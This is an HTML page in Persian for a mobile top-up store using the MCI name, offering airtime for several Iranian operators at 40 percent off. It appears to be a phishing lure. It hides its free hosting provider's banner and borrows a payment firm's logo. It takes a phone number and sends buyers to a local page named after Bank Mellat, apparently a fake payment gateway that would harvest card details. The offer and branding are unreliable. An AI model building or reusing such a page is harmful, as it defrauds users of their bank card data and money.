<!DOCTYPE html>
<html lang="fa" dir="rtl">


<head>
  <meta charset="UTF-8">
  
  <meta name="viewport" content="width=device-width" initial-scale="1">
<meta itemprop="name" content="خرید شارژ"/>
<meta itemprop="headline" content="فروشگاه خرید شارژ ام سی آی"/>
<meta itemprop="description" content="خرید شارژ مستقیم و کد شارژ ام سی آی- تخفیفات ویژه"/>
<style>img[alt="www.000webhost.com"]{display:none;}</style>
<style>

</style>
<meta itemprop="image" content="https://paystar.ir/home/images/logoemail.png"/>
<meta itemprop="author" content="ام سی آی"/>
  <link href="#" rel="stylesheet">
  <link href="css/font_irs.css" rel="stylesheet">
  <link href="css/style.css" rel="stylesheet">
  <title>شارژ ام سی آی</title>

<meta name="Description" content="خرید شارژ با 40 درصد تخفیف | شارژ ارزان" /><meta name="Keywords" content="خرید شارژ با 40 درصد تخفیف | شارژ ارزان" />

</head>
<body>
<div class="container">
  <div class="title">
  <h2>شـــارژ ام سی آی</h2>
  </div>
  <div class="content">
    <div class="header">
      <h1>شارژ ایرانسل، همراه اول و رایتل با تخفیف باور نکردنی!</h1>
    </div>
    <div id="alert" class="alert" style="display: none">
    <p>لطفا شماره موبایل را درست وارد کنید</p>
    
    </div>
	
    <div class="forms">
      <form method="send" action="mellat/index.php" >
        <div class="inlineform operator">
          <h4 class="priceselect">اپراتور  :</h4>
          <select class="forms" name="operator">
            <option value="1000">ایرانسل</option>
            <option value="2000">همراه اول</option>
            <option value="5000">رایتل</option>
            <option value="5000">تالیا</option>
          </select>
        </div>
        <div style="margin-top: 10px!important;" class="inlineform operator">
          <h4 class="priceselect">مبلغ  :</h4>
          <select onchange="changePrice()" id="price" class="forms" name="amount">
            <option value="12,000">۲,۰۰۰ ( با تخفیف ۱,۲۰۰ )</option>
            <option value="30,000">۵,۰۰۰ ( با تخفیف ۳,۰۰۰ )</option>
            <option value="60,000">۱۰,۰۰۰ ( با تخفیف ۶,۰۰۰ )</option>
            <option value="150,000">۲۰,۰۰۰ ( با تخفیف ۱۵,۰۰۰ )</option>
            <option value="300,000">۵۰,۰۰۰ ( با تخفیف ۳۰,۰۰۰ )</option>
          </select>
        </div>
        <div class="numb">
          <div class="numbers">
            <i><img src="images/phone.png" style="height: 20px; vertical-align: middle;"></i>
            <h2>همراه  :</h2>
            <input onfocus="removeAlert()" id="pnumber" type="text" maxlength="11" pattern="[0-9]{11}" required="required" name="tell" class="tell" placeholder="لطفا اعداد را انگلیسی وارد کنید">
            <span class="uinput">شماره همراه خود را وارد نمایید <span class="uniput2">(اجباری)</span></span><br>
            <div class="" style="margin-top: 15px">
              <i><img src="images/email.png" style="height: 20px; vertical-align: middle;"></i>
              <h2>ایمیل  :</h2>
              <input maxlength="30"
			  pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}$"
                placeholder="اختیاری"
                type="text"
                class="number"
                style="position: relative;
                left: 4px;" >
              <span class="uinput">لطفا ایمیل معتبری را وارد کنید <span class="uniputfree">(اختیاری)</span> </span><br>
            </div>
          </div>
        </div>

        <div class="gopay">
          <div class="nerkh">
            <h4>
              مبلغ پرداخت  :
              <span id="pay" class="price">12,000</span><span> ریال </span>
            </h4>
          </div>
<input class="btnsubmit" name="btn" type="submit"  value="پرداخت" /> 
        </div>
      </form>
    </div>
  </div>
  <div>
    <img class="mark" src="images/1e5dab5a.png" alt="">
    <img class="mark" src="images/logo.aspx.png" alt="">
  </div>

</div>

<script>
function changePrice() {
  let price = document.getElementById("price").value;
  console.log(price);
  let pay = document.getElementById("pay");
  pay.innerHTML = price;
}


 function removeAlert() {
   let alert = document.getElementById("alert");
   alert.style.display="none";

 }

</script>


</html>
 
